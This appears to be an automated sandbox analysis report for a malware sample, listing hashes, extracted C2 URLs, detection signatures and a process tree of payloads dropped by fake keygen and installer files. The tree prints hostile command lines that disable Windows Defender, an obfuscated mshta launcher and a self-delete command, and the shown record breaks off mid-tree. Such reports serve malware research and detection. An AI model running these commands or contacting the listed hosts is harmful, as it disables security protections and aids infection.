Resubmissions

22-10-2021 14:08

211022-rfwtxabga2 10

22-10-2021 13:33

211022-qtzmaabfg5 10

Analysis

  • max time kernel
    620s
  • max time network
    2434s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    22-10-2021 13:33

General

  • Target

    jks.exe

  • Size

    11.2MB

  • MD5

    60f0cdd0610280950f2a77c612d27c73

  • SHA1

    25b97a2f1e6a38a77868cef03ae2ad2b810e9551

  • SHA256

    3a4fee55dbf0ecf16b8bdc2a8fcba340c842a3e9d3762aeac3e07317501d9ec6

  • SHA512

    1cff0e480c88f02fc0fec9ea1f827f2f57804da999973f707e8fd7e5e6a7cb892b139c527f09cf785fc248381ddc02b8d31e321defd83ea9c82472fc2d5ca3f6

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

1875681804

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Installed Components in the registry 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 40 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 22 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 13 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2520
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      PID:3156
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:4548
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2780
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2772
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2508
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1940
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1444
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1316
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1256
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1108
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1028
                        • C:\Users\Admin\AppData\Roaming\csihugw
                          C:\Users\Admin\AppData\Roaming\csihugw
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:7184
                          • C:\Users\Admin\AppData\Roaming\csihugw
                            C:\Users\Admin\AppData\Roaming\csihugw
                            3⤵
                            • Checks SCSI registry key(s)
                            PID:10580
                        • C:\Users\Admin\AppData\Roaming\wvihugw
                          C:\Users\Admin\AppData\Roaming\wvihugw
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:7276
                        • \??\c:\windows\system\svchost.exe
                          c:\windows\system\svchost.exe
                          2⤵
                            PID:10204
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:312
                          • C:\Users\Admin\AppData\Local\Temp\jks.exe
                            "C:\Users\Admin\AppData\Local\Temp\jks.exe"
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:2824
                          • C:\Users\Admin\Desktop\CrowdInspect64.exe
                            "C:\Users\Admin\Desktop\CrowdInspect64.exe"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: GetForegroundWindowSpam
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:3068
                          • C:\Windows\system32\NOTEPAD.EXE
                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\lol.txt
                            1⤵
                            • Opens file in notepad (likely ransom note)
                            PID:1008
                          • C:\Users\Admin\Desktop\Comprehensive_Meta_Analysis_keygen_by_KeygenSumo.exe
                            "C:\Users\Admin\Desktop\Comprehensive_Meta_Analysis_keygen_by_KeygenSumo.exe"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3892
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1724
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                keygen-pr.exe -p83fsase3Ge
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3356
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3804
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                    C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                    5⤵
                                      PID:1008
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                  keygen-step-1.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3248
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
                                  keygen-step-6.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:372
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                  keygen-step-3.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1964
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2208
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 1.1.1.1 -n 1 -w 3000
                                      5⤵
                                      • Runs ping.exe
                                      PID:2244
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                  keygen-step-4.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:2748
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2136
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:3796
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5032
                                    • C:\Users\Admin\AppData\Roaming\7726728.exe
                                      "C:\Users\Admin\AppData\Roaming\7726728.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:6132
                                    • C:\Users\Admin\AppData\Roaming\2530618.exe
                                      "C:\Users\Admin\AppData\Roaming\2530618.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:3772
                                    • C:\Users\Admin\AppData\Roaming\8284900.exe
                                      "C:\Users\Admin\AppData\Roaming\8284900.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:5984
                                    • C:\Users\Admin\AppData\Roaming\3599765.exe
                                      "C:\Users\Admin\AppData\Roaming\3599765.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: SetClipboardViewer
                                      PID:5580
                                    • C:\Users\Admin\AppData\Roaming\2315579.exe
                                      "C:\Users\Admin\AppData\Roaming\2315579.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:5660
                                    • C:\Users\Admin\AppData\Roaming\2942478.exe
                                      "C:\Users\Admin\AppData\Roaming\2942478.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:5684
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Checks whether UAC is enabled
                                    PID:3608
                            • C:\Users\Admin\Desktop\setup_x86_x64_install.exe
                              "C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:2100
                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:3188
                                • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\setup_install.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\setup_install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:3760
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    4⤵
                                      PID:3128
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                        5⤵
                                          PID:1192
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                        4⤵
                                          PID:2300
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                            5⤵
                                              PID:3624
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Fri05eeb2dae7b88520a.exe
                                            4⤵
                                              PID:3904
                                              • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05eeb2dae7b88520a.exe
                                                Fri05eeb2dae7b88520a.exe
                                                5⤵
                                                  PID:2544
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Fri05beb1e355.exe
                                                4⤵
                                                  PID:4040
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05beb1e355.exe
                                                    Fri05beb1e355.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1336
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Fri055cc2a6e65.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1964
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri055cc2a6e65.exe
                                                    Fri055cc2a6e65.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1748
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      6⤵
                                                        PID:6140
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4736
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Fri05cc28ce70b.exe
                                                    4⤵
                                                      PID:296
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05cc28ce70b.exe
                                                        Fri05cc28ce70b.exe
                                                        5⤵
                                                          PID:2804
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Fri05a277b9a3d2.exe
                                                        4⤵
                                                          PID:1092
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05a277b9a3d2.exe
                                                            Fri05a277b9a3d2.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3724
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05a277b9a3d2.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05a277b9a3d2.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4880
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Fri0575b7d291a755f8.exe
                                                          4⤵
                                                            PID:3684
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri0575b7d291a755f8.exe
                                                              Fri0575b7d291a755f8.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:1196
                                                              • C:\Users\Admin\AppData\Roaming\4882046.exe
                                                                "C:\Users\Admin\AppData\Roaming\4882046.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:2080
                                                              • C:\Users\Admin\AppData\Roaming\6117626.exe
                                                                "C:\Users\Admin\AppData\Roaming\6117626.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:5204
                                                              • C:\Users\Admin\AppData\Roaming\2451128.exe
                                                                "C:\Users\Admin\AppData\Roaming\2451128.exe"
                                                                6⤵
                                                                  PID:3608
                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5872
                                                                • C:\Users\Admin\AppData\Roaming\3294472.exe
                                                                  "C:\Users\Admin\AppData\Roaming\3294472.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:4112
                                                                • C:\Users\Admin\AppData\Roaming\2382402.exe
                                                                  "C:\Users\Admin\AppData\Roaming\2382402.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:4900
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Fri05b5df5106928d62.exe
                                                              4⤵
                                                                PID:2768
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05b5df5106928d62.exe
                                                                  Fri05b5df5106928d62.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  PID:4272
                                                                  • C:\Users\Admin\Pictures\Adobe Films\39ZXQa5oCLwT8j6QVmh6fpUq.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\39ZXQa5oCLwT8j6QVmh6fpUq.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:2896
                                                                  • C:\Users\Admin\Pictures\Adobe Films\MHuNXGnb90wUDhte0oMkDM5O.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\MHuNXGnb90wUDhte0oMkDM5O.exe"
                                                                    6⤵
                                                                      PID:3412
                                                                    • C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe"
                                                                      6⤵
                                                                        PID:5348
                                                                        • C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\ZS0KehFbT7OVgptT6Lrlr0k_.exe"
                                                                          7⤵
                                                                            PID:6360
                                                                        • C:\Users\Admin\Pictures\Adobe Films\fCW5kUXiJ8PkhQixCDJJr8M9.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\fCW5kUXiJ8PkhQixCDJJr8M9.exe"
                                                                          6⤵
                                                                            PID:4972
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 664
                                                                              7⤵
                                                                              • Drops file in Windows directory
                                                                              • Program crash
                                                                              PID:4324
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 652
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:6940
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 680
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:4416
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 648
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:7392
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1096
                                                                              7⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              • Program crash
                                                                              PID:424
                                                                          • C:\Users\Admin\Pictures\Adobe Films\wLbJdD5QQq0knQ84VB8psLmX.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\wLbJdD5QQq0knQ84VB8psLmX.exe"
                                                                            6⤵
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:6324
                                                                            • C:\Users\Admin\Documents\wQtmlWBtshJUL_nJcJd4dVAX.exe
                                                                              "C:\Users\Admin\Documents\wQtmlWBtshJUL_nJcJd4dVAX.exe"
                                                                              7⤵
                                                                              • Checks computer location settings
                                                                              PID:7680
                                                                              • C:\Users\Admin\Pictures\Adobe Films\_Ceelq_4WzjWI69BKqxojcWL.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\_Ceelq_4WzjWI69BKqxojcWL.exe"
                                                                                8⤵
                                                                                  PID:5784
                                                                                • C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe"
                                                                                  8⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:6808
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                    9⤵
                                                                                      PID:9148
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\qRAT5lL7LV3vxuSS0V5lMPG_.exe" ) do taskkill -f -iM "%~NxM"
                                                                                        10⤵
                                                                                          PID:2176
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill -f -iM "qRAT5lL7LV3vxuSS0V5lMPG_.exe"
                                                                                            11⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:4760
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\W7eJc9dlLVagRgED_elZbrz0.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\W7eJc9dlLVagRgED_elZbrz0.exe" /mixtwo
                                                                                      8⤵
                                                                                        PID:6960
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\37duscjiVytdc04Qwci6AVm1.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\37duscjiVytdc04Qwci6AVm1.exe"
                                                                                        8⤵
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:1192
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          9⤵
                                                                                            PID:196
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              10⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5856
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\rrFfWkwCSEqYIlQoo2MWC3PH.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\rrFfWkwCSEqYIlQoo2MWC3PH.exe"
                                                                                          8⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:8860
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\eWR0oj1VGSIqSpNEj3N7ium5.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\eWR0oj1VGSIqSpNEj3N7ium5.exe"
                                                                                          8⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:6832
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\BI2rwvLaDWufsBeKlRxXkIcc.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\BI2rwvLaDWufsBeKlRxXkIcc.exe"
                                                                                          8⤵
                                                                                            PID:7276
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-L1P9S.tmp\BI2rwvLaDWufsBeKlRxXkIcc.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-L1P9S.tmp\BI2rwvLaDWufsBeKlRxXkIcc.tmp" /SL5="$205DC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\BI2rwvLaDWufsBeKlRxXkIcc.exe"
                                                                                              9⤵
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:8932
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-EVCOO.tmp\DYbALA.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-EVCOO.tmp\DYbALA.exe" /S /UID=2709
                                                                                                10⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Adds Run key to start application
                                                                                                PID:3496
                                                                                                • C:\Program Files\Google\LZQSYNOLMV\foldershare.exe
                                                                                                  "C:\Program Files\Google\LZQSYNOLMV\foldershare.exe" /VERYSILENT
                                                                                                  11⤵
                                                                                                    PID:6892
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7e-87dac-f24-d919b-c4786b34e5d84\Qorahuwejy.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7e-87dac-f24-d919b-c4786b34e5d84\Qorahuwejy.exe"
                                                                                                    11⤵
                                                                                                    • Checks computer location settings
                                                                                                    PID:728
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\93-7e603-82f-f8898-58eb9d72483f7\Myzhoxofalo.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\93-7e603-82f-f8898-58eb9d72483f7\Myzhoxofalo.exe"
                                                                                                    11⤵
                                                                                                      PID:1496
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0pnphvw4.n0k\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
                                                                                                        12⤵
                                                                                                          PID:8812
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0pnphvw4.n0k\setting.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\0pnphvw4.n0k\setting.exe SID=778 CID=778 SILENT=1 /quiet
                                                                                                            13⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:8484
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
